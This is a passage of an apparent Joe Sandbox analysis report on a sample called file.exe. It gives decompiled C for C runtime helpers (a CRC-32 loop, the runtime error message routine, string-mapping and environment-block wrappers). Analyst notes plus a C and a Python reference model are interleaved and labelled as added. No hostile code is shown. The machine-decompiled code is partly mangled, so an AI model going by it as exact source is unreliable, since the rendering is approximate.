                              							_t41 =  *(_t76 + 0xc00 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t64 + _t68 + 8) ^  *(_t76 + 0x800 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t76 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4);
                              							_t64 = _t64 + 8;
                              						} while (_t64 != 0);
                              						_t39 = _t41 ^  *(_t64 + _t68);
                              						_t63 = _t68;
                              						_t65 = _a4 - _t63;
                              						L8:
                              						while(_t65 != 0) {
                              							_t70 =  *_t63 & 0x000000ff;
                              							_t63 = _t63 + 1;
                              							_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t70 ^ _t39 & 0x000000ff) * 4);
                              							_t65 = _t65 - 1;
                              						}
                              						return _t39;
                              					}
                              				}
                              				goto L8;
                              			}

                              Statement addresses: 0x00418fcb to 0x004190a8 (0x00000000 for statements without a mapped instruction)

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                              • Instruction ID: adcd1020660a0caec7aa531f2501062eb824b7187074cdff0887c6cd02d8138b
                              • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                              • Instruction Fuzzy Hash: EF21377291442587C701DF1DE4986B7B7E1FFC8319F678B2BD9818B180CA39DC81D690
                              Uniqueness

                              Uniqueness Score: -1.00%
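                              Reading E00418FCB: both small loops use the reflected table-driven CRC byte step, crc = (crc >> 8) ^ T[(byte ^ crc) & 0xff], with T at _a8. The first loop only runs until the data pointer is 8-byte aligned (_t63 & 7); the unrolled loop then consumes 8 bytes per pass from T and three further 1 KiB tables at _a8 + 0x400, + 0x800 and + 0xc00 (a slicing-by-4 layout, two word steps per pass), and the L8 loop finishes the tail byte by byte. Nothing inverts the CRC on entry or exit, so a caller that wants the usual CRC-32 value has to apply the ~ itself. The C reference model below is an added example, not code from file.exe or from Joe Sandbox. It assumes the table holds the standard CRC-32 polynomial 0xEDB88320, which the report does not show (only the loop shape is visible), so the check to make is to dump the 4 KiB at _a8 from the process and compare it with the values the model produces (T[1] == 0x77073096 and T[0x80] == 0xEDB88320 for the standard table). Since the report flags a potential crypto function, a table match settles that this routine is a checksum rather than a cipher. One caveat: the decompiled expression for the unrolled step repeats the (& 0xff) and (>> 0x10 & 0xff) index lanes where a slicing-by-4 step also uses >> 8 and >> 24; confirm the exact shifts in the disassembly rather than matching on the decompiled text.

```c
/*
 * Added example, not code from file.exe or from Joe Sandbox: a reference
 * model of the table-driven CRC-32 loop in E00418FCB. Assumption (not shown
 * in the report): the table passed in _a8 is the standard reflected CRC-32
 * table for polynomial 0xEDB88320, and the three tables following it at
 * +0x400, +0x800, +0xc00 are the slicing-by-4 derived tables.
 * Build with: cc -std=c99 -O2 crc32_model.c
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define CRC32_POLY 0xEDB88320u  /* assumed polynomial, see note above */

/* tab[k] sits at byte offset k * 0x400 from the table base, which is how the
 * decompiled code indexes _t76 + 0x400 / 0x800 / 0xc00. */
static uint32_t tab[4][256];
static int tab_ready;

static void crc32_build_tables(void)
{
    if (tab_ready)
        return;
    /* tab[0][n]: one reflected byte step applied to the byte value n. */
    for (uint32_t n = 0; n < 256; n++) {
        uint32_t c = n;
        for (int k = 0; k < 8; k++)
            c = (c & 1) ? (CRC32_POLY ^ (c >> 1)) : (c >> 1);
        tab[0][n] = c;
    }
    /* tab[k][n]: k further zero-byte steps applied to tab[0][n]. */
    for (uint32_t n = 0; n < 256; n++) {
        uint32_t c = tab[0][n];
        for (int k = 1; k < 4; k++) {
            c = tab[0][c & 0xff] ^ (c >> 8);
            tab[k][n] = c;
        }
    }
    tab_ready = 1;
}

/* The byte step seen in both small loops of E00418FCB:
 *   _t39 = _t39 >> 8 ^ *(_t76 + (byte ^ _t39 & 0xff) * 4) */
uint32_t crc32_bytewise(uint32_t crc, const uint8_t *p, size_t len)
{
    crc32_build_tables();
    while (len--)
        crc = (crc >> 8) ^ tab[0][(*p++ ^ crc) & 0xff];
    return crc;
}

/* Slicing-by-4 step: fold one little-endian 32-bit word into the CRC using all
 * four tables. Two of these per iteration give the 8-bytes-per-pass loop in the
 * sample; the result is bit-identical to four byte steps. */
uint32_t crc32_slice4(uint32_t crc, const uint8_t *p, size_t len)
{
    crc32_build_tables();
    while (len >= 4) {
        crc ^= (uint32_t)p[0] | ((uint32_t)p[1] << 8)
             | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
        crc = tab[3][crc & 0xff] ^ tab[2][(crc >> 8) & 0xff]
            ^ tab[1][(crc >> 16) & 0xff] ^ tab[0][crc >> 24];
        p += 4;
        len -= 4;
    }
    return crc32_bytewise(crc, p, len);   /* tail bytes, as in the sample's L8 loop */
}

/* CRC-32 as zlib and ZIP/PE tooling report it: E00418FCB has no ~ on entry or
 * exit, so its caller must apply them; this wrapper does. */
uint32_t crc32_std(const void *data, size_t len)
{
    return ~crc32_slice4(~0u, (const uint8_t *)data, len);
}

/* Table fingerprint: compare with the dword at _a8 + which*0x400 + idx*4 in
 * the sample's memory dump. */
uint32_t crc32_table_entry(int which, int idx)
{
    crc32_build_tables();
    return tab[which & 3][idx & 0xff];
}

/* Self-check: the sliced form must agree with the byte-wise form for every
 * length 0..64 over a constructed buffer, including the unaligned tails. */
int crc32_slice4_matches_bytewise(void)
{
    uint8_t buf[64];
    for (int i = 0; i < 64; i++)
        buf[i] = (uint8_t)(i * 37 + 11);   /* constructed test data */
    for (size_t n = 0; n <= sizeof buf; n++)
        if (crc32_slice4(0x12345678u, buf, n) != crc32_bytewise(0x12345678u, buf, n))
            return 0;
    return 1;
}

int main(void)
{
    static const char msg[] = "123456789";   /* standard CRC-32 check vector */
    printf("crc32(\"%s\") = 0x%08x\n", msg, (unsigned)crc32_std(msg, 9));
    printf("T[1] = 0x%08x  T[0x80] = 0x%08x\n",
           (unsigned)crc32_table_entry(0, 1), (unsigned)crc32_table_entry(0, 0x80));
    printf("slice4 == bytewise: %s\n", crc32_slice4_matches_bytewise() ? "yes" : "NO");
    return 0;
}
```

                              If the dumped table differs from the model, the sample uses a non-standard polynomial or a different slicing layout: rebuild tab[0] from the dumped first 1 KiB and rerun the equivalence check instead of assuming CRC-32. crc32_std() returns the same value as zlib's crc32() and Python's zlib.crc32, so it is the number to compare when the sample checksums a file, a string or a section.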

                              C-Code - Quality: 96%
                              			E00417836(void* __edi, long _a4) {
                              				char _v164;
                              				char _v424;
                              				int _t17;
                              				long _t19;
                              				signed int _t42;
                              				long _t47;
                              				void* _t48;
                              				signed int _t54;
                              				void** _t56;
                              				void* _t57;
                              
                              				_t48 = __edi;
                              				_t47 = _a4;
                              				_t42 = 0;
                              				_t17 = 0x422a58;
                              				while(_t47 !=  *_t17) {
                              					_t17 = _t17 + 8;
                              					_t42 = _t42 + 1;
                              					if(_t17 < 0x422ae8) {
                              						continue;
                              					}
                              					break;
                              				}
                              				_t54 = _t42 << 3;
                              				_t2 = _t54 + 0x422a58; // 0x2c000000
                              				if(_t47 ==  *_t2) {
                              					_t17 =  *0x423348; // 0x0
                              					if(_t17 == 1 || _t17 == 0 &&  *0x420734 == 1) {
                              						_t16 = _t54 + 0x422a5c; // 0x41bd2c
                              						_t56 = _t16;
                              						_t19 = E004144D0( *_t56);
                              						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
                              					} else {
                              						if(_t47 != 0xfc) {
                              							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
                              								E00418230( &_v424, "<program name unknown>");
                              							}
                              							_push(_t48);
                              							_t49 =  &_v424;
                              							if(E004144D0( &_v424) + 1 > 0x3c) {
                              								_t49 = E004144D0( &_v424) +  &_v424 - 0x3b;
                              								E004183B0(E004144D0( &_v424) +  &_v424 - 0x3b, "...", 3);
                              								_t57 = _t57 + 0x10;
                              							}
                              							E00418230( &_v164, "Runtime Error!\n\nProgram: ");
                              							E00418240( &_v164, _t49);
                              							E00418240( &_v164, "\n\n");
                              							_t12 = _t54 + 0x422a5c; // 0x41bd2c
                              							E00418240( &_v164,  *_t12);
                              							_t17 = E00418320( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
                              						}
                              					}
                              				}
                              				return _t17;
                              			}

                              Statement addresses: 0x00417836 to 0x00417988 (0x00000000 for statements without a mapped instruction)

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004178A3
                              • GetStdHandle.KERNEL32(000000F4,0041BD2C,00000000,00000000,00000000,?), ref: 00417979
                              • WriteFile.KERNEL32(00000000), ref: 00417980
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: File$HandleModuleNameWrite
                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $X*B$*B
                              • API String ID: 3784150691-2787626558
                              • Opcode ID: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                              • Instruction ID: 83e6cc08efc147308ddc610541e3e7ace00831554afff49654370310fabd765f
                              • Opcode Fuzzy Hash: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                              • Instruction Fuzzy Hash: 6E310472A00218AFEF20E660DD45FDA737DEB45344F5000ABF544D6140EBBCAAC58BAD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 61%
                              			E0041881D(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
                              				signed int _v8;
                              				intOrPtr _v20;
                              				short* _v28;
                              				int _v32;
                              				short* _v36;
                              				short* _v40;
                              				int _v44;
                              				void* _v60;
                              				int _t61;
                              				int _t62;
                              				int _t82;
                              				int _t83;
                              				int _t88;
                              				short* _t89;
                              				int _t90;
                              				void* _t91;
                              				int _t99;
                              				intOrPtr _t101;
                              				short* _t102;
                              				int _t104;
                              
                              				_push(0xffffffff);
                              				_push(0x41be00);
                              				_push(E00414A2C);
                              				_push( *[fs:0x0]);
                              				 *[fs:0x0] = _t101;
                              				_t102 = _t101 - 0x1c;
                              				_v28 = _t102;
                              				_t104 =  *0x423554; // 0x1
                              				if(_t104 != 0) {
                              					L5:
                              					if(_a16 > 0) {
                              						_t83 = E00418A41(_a12, _a16);
                              						_pop(_t91);
                              						_a16 = _t83;
                              					}
                              					_t61 =  *0x423554; // 0x1
                              					if(_t61 != 2) {
                              						if(_t61 != 1) {
                              							goto L21;
                              						} else {
                              							if(_a28 == 0) {
                              								_t82 =  *0x42354c; // 0x0
                              								_a28 = _t82;
                              							}
                              							asm("sbb eax, eax");
                              							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
                              							_v32 = _t88;
                              							if(_t88 == 0) {
                              								goto L21;
                              							} else {
                              								_v8 = 0;
                              								E00413CC0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
                              								_v28 = _t102;
                              								_v40 = _t102;
                              								_v8 = _v8 | 0xffffffff;
                              								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
                              									goto L21;
                              								} else {
                              									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
                              									_v44 = _t99;
                              									if(_t99 == 0) {
                              										goto L21;
                              									} else {
                              										if((_a9 & 0x00000004) == 0) {
                              											_v8 = 1;
                              											E00413CC0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
                              											_v28 = _t102;
                              											_t89 = _t102;
                              											_v36 = _t89;
                              											_v8 = _v8 | 0xffffffff;
                              											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
                              												goto L21;
                              											} else {
                              												_push(0);
                              												_push(0);
                              												if(_a24 != 0) {
                              													_push(_a24);
                              													_push(_a20);
                              												} else {
                              													_push(0);
                              													_push(0);
                              												}
                              												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
                              												if(_t99 == 0) {
                              													goto L21;
                              												} else {
                              													goto L30;
                              												}
                              											}
                              										} else {
                              											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
                              												L30:
                              												_t62 = _t99;
                              											} else {
                              												goto L21;
                              											}
                              										}
                              									}
                              								}
                              							}
                              						}
                              					} else {
                              						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                              					}
                              				} else {
                              					_push(0);
                              					_push(0);
                              					_t90 = 1;
                              					if(LCMapStringW(0, 0x100, 0x41bdf8, _t90, ??, ??) == 0) {
                              						if(LCMapStringA(0, 0x100, 0x41bdf4, _t90, 0, 0) == 0) {
                              							L21:
                              							_t62 = 0;
                              						} else {
                              							 *0x423554 = 2;
                              							goto L5;
                              						}
                              					} else {
                              						 *0x423554 = _t90;
                              						goto L5;
                              					}
                              				}
                              				 *[fs:0x0] = _v20;
                              				return _t62;
                              			}

                              Statement addresses: 0x00418820 to 0x00418a3a (0x00000000 for statements without a mapped instruction)

                              APIs
                              • LCMapStringW.KERNEL32(00000000,00000100,0041BDF8,00000001,00000000,00000000,747170F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 0041885F
                              • LCMapStringA.KERNEL32(00000000,00000100,0041BDF4,00000001,00000000,00000000,?,?,004186BE,?,?,?,00000000,00000001), ref: 0041887B
                              • LCMapStringA.KERNEL32(?,?,?,004186BE,?,?,747170F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188C4
                              • MultiByteToWideChar.KERNEL32(?,004256C5,?,004186BE,00000000,00000000,747170F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188FC
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,004186BE,?,00000000,?,?,004186BE,?), ref: 00418954
                              • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,004186BE,?), ref: 0041896A
                              • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,004186BE,?), ref: 0041899D
                              • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,004186BE,?), ref: 00418A05
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: String$ByteCharMultiWide
                              • String ID:
                              • API String ID: 352835431-0
                              • Opcode ID: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                              • Instruction ID: 3960beb12fca16cbc5043acf4b8975ab8d8a6698fa07e30ad5f7fd63c5f4fb56
                              • Opcode Fuzzy Hash: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                              • Instruction Fuzzy Hash: 14517B71900209EFCF228F95CC45AEF7FB5FF48794F10452AF918A1260C7398991DBAA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0041750F() {
                              				int _v4;
                              				int _v8;
                              				intOrPtr _t7;
                              				CHAR* _t9;
                              				WCHAR* _t17;
                              				int _t20;
                              				char* _t24;
                              				int _t32;
                              				CHAR* _t36;
                              				WCHAR* _t38;
                              				void* _t39;
                              				int _t42;
                              
                              				_t7 =  *0x423508; // 0x1
                              				_t32 = 0;
                              				_t38 = 0;
                              				_t36 = 0;
                              				if(_t7 != 0) {
                              					if(_t7 != 1) {
                              						if(_t7 != 2) {
                              							L27:
                              							return 0;
                              						}
                              						L18:
                              						if(_t36 != _t32) {
                              							L20:
                              							_t9 = _t36;
                              							if( *_t36 == _t32) {
                              								L23:
                              								_t41 = _t9 - _t36 + 1;
                              								_t39 = E00413E65(_t9 - _t36 + 1);
                              								if(_t39 != _t32) {
                              									E00414090(_t39, _t36, _t41);
                              								} else {
                              									_t39 = 0;
                              								}
                              								FreeEnvironmentStringsA(_t36);
                              								return _t39;
                              							} else {
                              								goto L21;
                              							}
							do {	// 0x00417602
								do {	// 0x00417602
									L21:	// 0x00417602
									_t9 =  &(_t9[1]);	// 0x00417602
								} while ( *_t9 != _t32);	// 0x00417603
								_t9 =  &(_t9[1]);	// 0x00417607
							} while ( *_t9 != _t32);	// 0x00417608  walk the ANSI block to its double-NUL terminator (_t32 holds 0 throughout)
							goto L23;
						}	// 0x00417602
						_t36 = GetEnvironmentStrings();	// 0x004175f6
						if(_t36 == _t32) {	// 0x004175fa
							goto L27;
						}
						goto L20;
					}	// 0x004175fa
					L6:	// 0x00417566
					if(_t38 != _t32) {	// 0x00417568
						L8:	// 0x00417576
						_t17 = _t38;	// 0x00417579
						if( *_t38 == _t32) {	// 0x0041757b  empty block: the length is just the terminating NUL
							L11:	// 0x0041758b
							_t20 = (_t17 - _t38 >> 1) + 1;	// 0x00417597  wide-char count including the final NUL
							_v4 = _t20;	// 0x0041759e
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);	// 0x004175a4  size query (CP_ACP, no flags)
							if(_t42 != _t32) {	// 0x004175a8
								_t24 = E00413E65(_t42);	// 0x004175ab  heap allocation helper (malloc)
								_v8 = _t24;	// 0x004175b3
								if(_t24 != _t32) {	// 0x004175b7
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {	// 0x004175c8  conversion proper
										E00413F9F(_v8);	// 0x004175ce  free the buffer on failure
										_v8 = _t32;	// 0x004175d4
									}	// 0x004175d4
									_t32 = _v8;	// 0x004175d8
								}	// 0x004175d8
							}	// 0x004175b7
							FreeEnvironmentStringsW(_t38);	// 0x004175dd
							return _t32;
						} else {
							goto L9;
						}
						do {	// 0x0041757d
							do {	// 0x0041757d
								L9:	// 0x0041757d
								_t17 =  &(_t17[1]);	// 0x0041757e
							} while ( *_t17 != _t32);	// 0x0041757f
							_t17 =  &(_t17[1]);	// 0x00417585
						} while ( *_t17 != _t32);	// 0x00417586  walk the wide block to its double-NUL terminator
						goto L11;
					}	// 0x0041757d
					_t38 = GetEnvironmentStringsW();	// 0x0041756c
					if(_t38 == _t32) {	// 0x00417570
						goto L27;
					}
					goto L8;
				}	// 0x00417570
				_t38 = GetEnvironmentStringsW();	// 0x0041752c  first call: probe which API works and cache the answer in *0x423508
				if(_t38 == 0) {	// 0x00417530
					_t36 = GetEnvironmentStrings();	// 0x00417544
					if(_t36 == 0) {	// 0x00417548
						goto L27;
					}
					 *0x423508 = 2;	// 0x0041754e  2 = use the ANSI API from now on
					goto L18;
				}	// 0x0041754e
				 *0x423508 = 1;	// 0x00417532  1 = use the Unicode API from now on
				goto L6;
			}
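The environment-block handling in the routine whose C-code ends above (the GetEnvironmentStringsW / WideCharToMultiByte wrapper), re-expressed in Python as an added worked example. This is not code from the report or from the sample: it reproduces the nested do/while scan that finds the double-NUL terminator, the length formula `(end - start >> 1) + 1`, and the wide-to-ANSI conversion. The sample block is constructed for the example, and CP_ACP is assumed to be cp1252; a failing WideCharToMultiByte call (the path where the decompile frees the buffer and returns 0) cannot be provoked from Python and is only noted in a comment.

```python
"""Emulation of the double-NUL environment-block handling seen in the decompile."""

# Constructed sample input (not taken from the sandbox run): two variables, each
# NUL-terminated, followed by the block's second NUL, as GetEnvironmentStringsW returns it.
SAMPLE_BLOCK_W = "PATH=C:\\Windows\0TEMP=C:\\Temp\0\0".encode("utf-16-le")


def wide_env_block_units(block: bytes) -> int:
    """Length in UTF-16 code units, including the final NUL, of a double-NUL-terminated
    block, computed the way the nested do/while loops do: walk string by string until
    the code unit after a string terminator is itself NUL, then (end - start) / 2 + 1.
    The block must be well formed; like the original, this reads until it finds the
    double NUL (a malformed block raises IndexError here instead of reading past the end)."""
    units = [int.from_bytes(block[i:i + 2], "little") for i in range(0, len(block) - 1, 2)]
    p = 0
    if units[p] != 0:                 # empty block: the length is just the one terminating NUL
        while True:
            while True:               # inner loop: advance to the NUL that ends this string
                p += 1
                if units[p] == 0:
                    break
            p += 1                    # step over it ...
            if units[p] == 0:         # ... a second NUL in a row ends the block
                break
    return p + 1


def split_env_block(block: bytes) -> list:
    """Return the 'NAME=value' strings of a wide block (what the scan is really walking)."""
    n = wide_env_block_units(block)
    text = block[:2 * (n - 1)].decode("utf-16-le")   # drop the block terminator, keep per-string NULs
    return [s for s in text.split("\0") if s]


def wide_env_block_to_ansi(block: bytes, codepage: str = "cp1252") -> bytes:
    """Emulate the W->A conversion: size the input exactly as the decompile does, then
    convert the whole block including both terminating NULs. WideCharToMultiByte with
    flags 0 substitutes a default character for unmappable code points, which
    errors='replace' mirrors; the decompile's free-and-return-0 path corresponds to an
    API failure that cannot occur here."""
    n = wide_env_block_units(block)
    return block[:2 * n].decode("utf-16-le").encode(codepage, errors="replace")
```

Running `split_env_block(SAMPLE_BLOCK_W)` yields the two variables, and the returned ANSI block is byte-for-byte the narrow form of the same double-NUL layout; an input of just one wide NUL is reported as length 1, matching the `*_t38 == 0` shortcut to L11.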

                              APIs
                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041752A
                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041753E
                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041756A
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175A2
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175C4
                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175DD
                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 004175F0
                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041762E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                              • String ID:
                              • API String ID: 1823725401-0
                              • Opcode ID: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                              • Instruction ID: 0d29547afa55ef8e208fbe3ff43deda8167c9cf171b961166aceb77faed46397
                              • Opcode Fuzzy Hash: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                              • Instruction Fuzzy Hash: 4A31ADB250D3157ED7207F799C848FBBABDEA49368B11053BF555C3200EA298DC286AD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
			// Analyst note: this routine matches the statically linked Microsoft C runtime helper __crtGetStringTypeA
			// (probe GetStringTypeW once, fall back to GetStringTypeA, cache the choice in *0x423558). It is runtime
			// support code, not sample-specific logic. Helper roles in the comments are inferred from call signatures;
			// the helper bodies are not shown here. Trailing hex comments are the instruction addresses.
			E00418A6C(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);	// 0x00418a6f  SEH frame setup
				_push(0x41be18);	// 0x00418a71
				_push(E00414A2C);	// 0x00418a76
				_push( *[fs:0x0]);	// 0x00418a81
				 *[fs:0x0] = _t62;	// 0x00418a82
				_t63 = _t62 - 0x18;	// 0x00418a89
				_v28 = _t63;	// 0x00418a8f
				_t31 =  *0x423558;	// 0x00418a92  cached API choice (0 = not probed yet, 1 = W, 2 = A); observed value 0x1
				if(_t31 != 0) {	// 0x00418a9b
					L6:	// 0x00418adb
					if(_t31 != 2) {	// 0x00418ade
						if(_t31 != 1) {	// 0x00418b07
							goto L18;
						} else {	// 0x00418b0d
							if(_a20 == 0) {	// 0x00418b10
								_t44 =  *0x42354c;	// 0x00418b12  default code page global; observed value 0x0
								_a20 = _t44;	// 0x00418b17
							}	// 0x00418b17
							asm("sbb eax, eax");	// 0x00418b27
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);	// 0x00418b31  size query; flags = MB_PRECOMPOSED (1), MB_ERR_INVALID_CHARS (8) selected by _a28
							_v36 = _t37;	// 0x00418b37
							if(_t37 == 0) {	// 0x00418b3c
								goto L18;
							} else {	// 0x00418b3e
								_v8 = 0;	// 0x00418b3e
								E00413CC0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);	// 0x00418b4b  stack probe / alloca for 2 * cch bytes, rounded up to 4
								_v28 = _t63;	// 0x00418b50
								_t60 = _t63;	// 0x00418b53
								_v40 = _t60;	// 0x00418b55
								E00417DA0(_t60, 0, _t37 + _t37);	// 0x00418b5b  memset(buffer, 0, 2 * cch)
								_v8 = _v8 | 0xffffffff;	// 0x00418b70
								if(_t60 == 0) {	// 0x00418b76
									goto L18;
								} else {	// 0x00418b78
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);	// 0x00418b87  conversion proper
									if(_t43 == 0) {	// 0x00418b8f
										goto L18;
									} else {	// 0x00418b91
